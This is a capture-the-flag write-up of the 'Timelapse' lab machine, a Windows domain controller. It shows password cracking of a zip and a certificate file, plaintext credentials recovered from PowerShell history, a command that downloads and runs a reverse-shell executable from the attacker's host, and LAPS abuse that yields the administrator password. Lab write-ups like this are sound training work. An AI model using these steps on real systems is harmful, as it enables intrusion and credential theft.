IP -> 10.10.11.152
We start by running nmap.
$ nmap -p- -v -sCV -Pn 10.10.11.152
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-01 04:27:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after: 2022-10-25T14:25:29
| MD5: e233 a199 4504 0859 013f b9c5 e4f6 91c3
|_SHA-1: 5861 acf7 76b8 703f d01e e25d fc7c 9952 a447 7652
|_ssl-date: 2022-04-01T04:28:34+00:00; +8h00m00s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
50357/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-04-01T04:27:56
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
We see some services running for what looks like to be an AD environment because of Kerberos and LDAP. We also have SMB running, let’s list the shares.
$ smbclient -N -L //10.10.11.152/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup availablThe share “Shares” caught my attention. Let’s inspect further.
$ smbclient -N //10.10.11.152/Shares
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 16:39:15 2021
.. D 0 Mon Oct 25 16:39:15 2021
Dev D 0 Mon Oct 25 20:40:06 2021
HelpDesk D 0 Mon Oct 25 16:48:42 2021
6367231 blocks of size 4096. 2392047 blocks available
smb: \>We see two directories, Dev and HelpDesk. Let’s see their contents.
smb: \> dir Dev/
. D 0 Mon Oct 25 20:40:06 2021
.. D 0 Mon Oct 25 20:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 16:46:42 2021
6367231 blocks of size 4096. 2394141 blocks availableA backup! Let’s download it and inspect the other folder.
smb: \> dir HelpDesk/
. D 0 Mon Oct 25 16:48:42 2021
.. D 0 Mon Oct 25 16:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 15:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 15:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 15:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 15:57:44 2021
6367231 blocks of size 4096. 2394141 blocks availableLAPS is software for password management. Let’s download it all.
Now let’s unzip the winrm backup and see its contents.
$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:It seems to be password protected, so let’s generate a hash with zip2john and try to crack it with rockyou.txt
$ zip2john winrm_backup.zip > winrm_backup.hash
Created directory: /home/javier/.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: 2b chk, TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683
$ cat winrm_backup.hash
winrm_backup.zip/legacyy_dev_auth.pfx:$pkzip2$1*2*2*0*...
$ john --wordlist=/opt/Hacking/rockyou.txt winrm_backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-06-08 12:53) 1.123g/s 3902Kp/s 3902Kc/s 3902KC/s surfrox1391..supergau
Use the "--show" option to display all of the cracked passwords reliably
Session completedWe got the password! Now let’s unzip its contents.
$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
inflating: legacyy_dev_auth.pfx
$ ls
legacyy_dev_auth.pfx winrm_backup.zipIt contains a PFX file, which contains key to login through winrm. Let’s crack the password!
$ pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.hash
$ cat legacyy_dev_auth.hash
legacyy_dev_auth.pfx:$pfxng$1$20$2000$20$eb755568327396de179c4a5d668ba8....
$ john --wordlist=/opt/Hacking/rockyou.txt legacyy_dev_auth.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx [PKCS12 PBE (.pfx, .p12) (SHA-1 to SHA-512) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:03:12 DONE (2022-06-08 13:03) 0.005195g/s 16787p/s 16787c/s 16787C/s thuglife03282006..thug209
Use the "--show" option to display all of the cracked passwords reliably
Session completedWe got the password! Time to extract the certificates!
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.key -nodes
Enter Import Password: thuglegacy
$ cat priv-key.key
Bag Attributes
Microsoft Local Key set: <No Values>
localKeyID: 01 00 00 00
friendlyName: te-4a...
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.crt
Enter Import Password: thuglegacy
$ cat certificate.crt
Bag Attributes
localKeyID: 01 00 00 00
subject=CN = Legacyy...Now that we have extracted the certificates I will try and log in using evil winrm. But since this is a AD controller we have to configure the domains first. So let’s go back to our nmap scan, get the hostname and add them to the /etc/hosts file.
10.10.11.152 dc01.timelapse.htb timelapse.htb$ evil-winrm -S -c certificate.crt -k priv-key.key -i dc01.timelapse.htb
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyyGreat! We are now inside the AD controller as the user legacyy. We found and downloaded the LAPs directory before. Let’s check if our current user has permission to manage LAPS credentials.
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================= ============================================
timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Development Group S-1-5-21-671920749-559770252-3318990721-3101 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.It looks like we can’t manage passwords. Let’s read our past command history
*Evil-WinRM* PS C:\Users\legacyy> cd "C:/Users/legacyy/AppData/Roamingcrosoft/Windows/PowerShell/PSReadLine/"
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> dir
Directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type "C:/Users/legacyy/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt"
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exitWe can see that our user wasn’t careful with their history!. We got credentials for the user svc_deploy. Let’s try rerunning the same commands and see what we get!
*Evil-WinRM* PS C:\Users\legacyy> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users\legacyy> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\legacyy> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
*Evil-WinRM* PS C:\Users\legacyy> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deployWe see that it actually works! So let’s try and get a reverse shell on this user. I will use my own reverse shell for this one. https://github.com/CaraTortu/RevShell/releases/download/v1.0.0/hello_x64.exe.
We start a web server with python3 -m http.server hosting the file hello_x64.exe which I have renamed to rev.exe.
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Invoke-WebRequest -Uri http://10.10.14.103:8000/rev.exe -Out rev.exe; .\rev.exe 10.10.14.103 1234}And in out netcat listener for the shell we get this.
$ nc -lvnp 1234
Connection from 10.10.11.152:57689
$ whoami
timelapse\svc_deployNow let’s check if this user does have permission to manage LAPS credentials.
$ whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.Yes! We are part of the LAPS_Readers group!. Now we have to install the powershell LAPS scripts.
I downloaded https://github.com/ztrhgf/LAPS as a zip file and downloaded it to the machine.
$ Expand-Archive -LiteralPath z.zip -DestinationPath .
$ Import-Module ./AdmPwd.PS/AdmPwd.PS.psd1
$ Get-ADComputer -Identity "DC01" -Server "dc01.timelapse.htb" -properties ms-mcs-admpwd,ms-mcs-admpwdexpirationtime | select-object ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
ms-mcs-admpwd ms-mcs-admpwdexpirationtime
------------- ---------------------------
-Y%(XzP7....... 132995997519937170We got the administrator password! Now let’s log in using evil-winrm again to get a reverse shell but this time with Administrator credentials.
*Evil-WinRM* PS C:\Users\legacyy> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\Users\legacyy> $p = ConvertTo-SecureString '-Y%(XzP7x;y;A+Mp...' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\legacyy> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
*Evil-WinRM* PS C:\Users\legacyy> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Invoke-WebRequest -Uri http://10.10.14.103:8000/rev.exe -Out rev.exe; .\rev.exe 10.10.14.103 1234}And on our end:
$ nc -lvnp 1234
Connection from 10.10.11.152:64567
$ whoami
timelapse\administrator
$ type ../../TRX/Desktop/root.txt
f6420f241c8cd8181..And we got the root flag!
I hope you enjoyed this writeup 🙂